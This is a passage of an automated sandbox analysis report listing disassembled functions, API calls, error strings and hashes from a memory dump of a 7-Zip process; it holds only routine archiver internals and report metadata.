                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A76AF
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A76BB
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A76C7
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A76D3
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB335
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB342
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB34E
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB358
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB362
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB36C
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB376
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB310: free.MSVCRT ref: 006AB380
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A76E4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                                                            • Instruction ID: 0b479cc77e3759f83aff333d2ddca51c9ae2079d90fcc204224d31c9cd11ff30
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57E0E572215D4181CB90FF35DCA51DC6361E79BB58F180175AF1D9F3A2DE10C9438758
                                                                                                                                                                                                                                                                            Function 006A02F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                                                                                            • String ID: Internal collision in update action set
                                                                                                                                                                                                                                                                            • API String ID: 265668421-2378581463
                                                                                                                                                                                                                                                                            • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                                                            • Instruction ID: f095a16ed45fc6e7f95646a6fce1eb4a0ed0b2bb8aa32603dcfd21fb55e40634
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1412632308685CAEF34EB19E4547AE7792F38A78CF048119EB8943B58DB79D956CF00
                                                                                                                                                                                                                                                                            Function 00696D5C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00696E91
                                                                                                                                                                                                                                                                              • Part of subcall function 00663518: free.MSVCRT ref: 00663551
                                                                                                                                                                                                                                                                              • Part of subcall function 00663314: memmove.MSVCRT ref: 00663339
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00696E83
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID: exe
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-1801697008
                                                                                                                                                                                                                                                                            • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                                                                                            • Instruction ID: 9efe8599b8f658ea6a4c8bac24c5ab895205d37854bbc0968b27d8698c652f4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD31E663304A4196CE60EB25E45019EB732F7917D4F845216FBAF47B69DF28C68AC704
                                                                                                                                                                                                                                                                            Function 00689380 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ByteStringmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 400576877-0
                                                                                                                                                                                                                                                                            • Opcode ID: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                                                                                            • Instruction ID: 571e6837aff5a8020ad8fce928077a947de55f43c79d19544693110e98e61c7e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321B573305B8092EB64AF51E4503B972A2FB887A4F4C4325AF9E0B794DF78C856C724
                                                                                                                                                                                                                                                                            Function 00689644 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$wcscmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4021281200-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                                                                                                                                                            • Instruction ID: 57dbdd5228f0c95e67813ea343038a65b6bf97d2972ae62c7357bed1793fdbee
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C21FF7631464092DB20BF26E4402B97362EBCABE4F185325EE6A47794EF38C586CB10
                                                                                                                                                                                                                                                                            Function 0066FADC Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: Unsupported charset:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-616772432
                                                                                                                                                                                                                                                                            • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                                                                                            • Instruction ID: 4902f357a5d08c619056da4e424bfc24ba96a3285abd84acac203d473d2e8fea
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B21B673204A0192DB20DB18E8A039D7722E7C57E8F544326EBAD477B9CF69C986C740
                                                                                                                                                                                                                                                                            Function 00666D48 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00667D4C: GetFileAttributesW.KERNELBASE ref: 00667D6E
                                                                                                                                                                                                                                                                              • Part of subcall function 00667D4C: GetFileAttributesW.KERNEL32 ref: 00667DA5
                                                                                                                                                                                                                                                                              • Part of subcall function 00667D4C: free.MSVCRT ref: 00667DB2
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32 ref: 00666D90
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32 ref: 00666DCA
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00666DDA
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00666DE8
                                                                                                                                                                                                                                                                              • Part of subcall function 006668A0: SetFileAttributesW.KERNELBASE ref: 006668C7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Attributesfree$Delete
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 324319583-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                                                                                            • Instruction ID: 9e2fddadd5c78ec72273d8a6d9bebc0fd9ff8b4b4b2492d30e4b60b50419f804
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69018032304A8141CA30AF24FC613E957235FC7BB4F581325BD6A9B3E5EE29C9569601
                                                                                                                                                                                                                                                                            Function 0067211C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00672137
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006721BB
                                                                                                                                                                                                                                                                              • Part of subcall function 00666618: FormatMessageW.KERNEL32 ref: 00666676
                                                                                                                                                                                                                                                                              • Part of subcall function 00666618: LocalFree.KERNEL32 ref: 00666698
                                                                                                                                                                                                                                                                              • Part of subcall function 0066362C: memmove.MSVCRT ref: 00663659
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00672182
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                                            • API String ID: 1743135865-3653984579
                                                                                                                                                                                                                                                                            • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                                                            • Instruction ID: fdca57883ef0ff0e064ab41f109928a2c10190974352b43c1289aa1ab7513823
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5401A96330490090CA60EB25E85125E7732EBC5BF4F545325BF5E877B8DF28CA86C744
                                                                                                                                                                                                                                                                            Function 0066C878 Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                                                                                                                                                            • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                                                            • Instruction ID: 5020eb3951bb685cf91823fdbf0f90e35b2f7c6b4b3227a58134e4760fd0281a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE012B227208608BD7216B3DDC007796296B709BF5F904235FE8ADBB50DB29CC428BC2
                                                                                                                                                                                                                                                                            Function 006AACDC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs
                                                                                                                                                                                                                                                                            • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                                                                                                                                                            • API String ID: 1795875747-932691680
                                                                                                                                                                                                                                                                            • Opcode ID: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                                                                                                                                                            • Instruction ID: 7268a45d5c0c1bcd5264fefb49a68ee9b2c4bb4e5a726cee3f44c82ed5290bdd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab942afea8ab6607a7c9d9281537d5881677c1f1a7467293dd987fcb7a8caf1a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33018C72201904DADB14FFA0E8903A83323EB86741F805026EA4E93664DF39CC96CB46
                                                                                                                                                                                                                                                                            Function 0066695C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DirectoryRemovefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 736856642-0
                                                                                                                                                                                                                                                                            • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                                                            • Instruction ID: df0f14021a159e08f8bec52ed2e4c1f472b0c3f81641b69478d8f2db32d63663
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0A926308A0281CA30AF61E96037D5326A7877F4F440325BEAA577E5CF25C946CB05
                                                                                                                                                                                                                                                                            Function 00662EF4 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00662F5B
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0066302B,?,?,?,?,00663698), ref: 00662F2C
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00662F34
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Unsupported switch postfix -stm, xrefs: 00662EF6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                                                            • String ID: Unsupported switch postfix -stm
                                                                                                                                                                                                                                                                            • API String ID: 3321538808-3553869907
                                                                                                                                                                                                                                                                            • Opcode ID: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                                                                                            • Instruction ID: 69b5ac164d2951ea19a74d473f49dd4c3cfdcbaf09c16723f8af328942ad9068
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F0F67670068586DB28AF46E4A026DB363EB857D4F14C064DB8A4BB11CE39D896CB04
                                                                                                                                                                                                                                                                            Function 00662A9C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _CxxThrowException.MSVCRT ref: 00662AFD
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            • memmove.MSVCRT ref: 00662ACE
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00662AD6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                                                            • String ID: (LP-
                                                                                                                                                                                                                                                                            • API String ID: 3321538808-3833670221
                                                                                                                                                                                                                                                                            • Opcode ID: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                                                                                            • Instruction ID: 5e5ec89f0fdb9036ecc3aab405fa2d444f97d01a2f20460bec90b089db418def
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1F0907660068686DB24AF8AE8A066DB322E7897D4F14C029DF8A07714DA39DC968B04
                                                                                                                                                                                                                                                                            Function 006ABF24 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
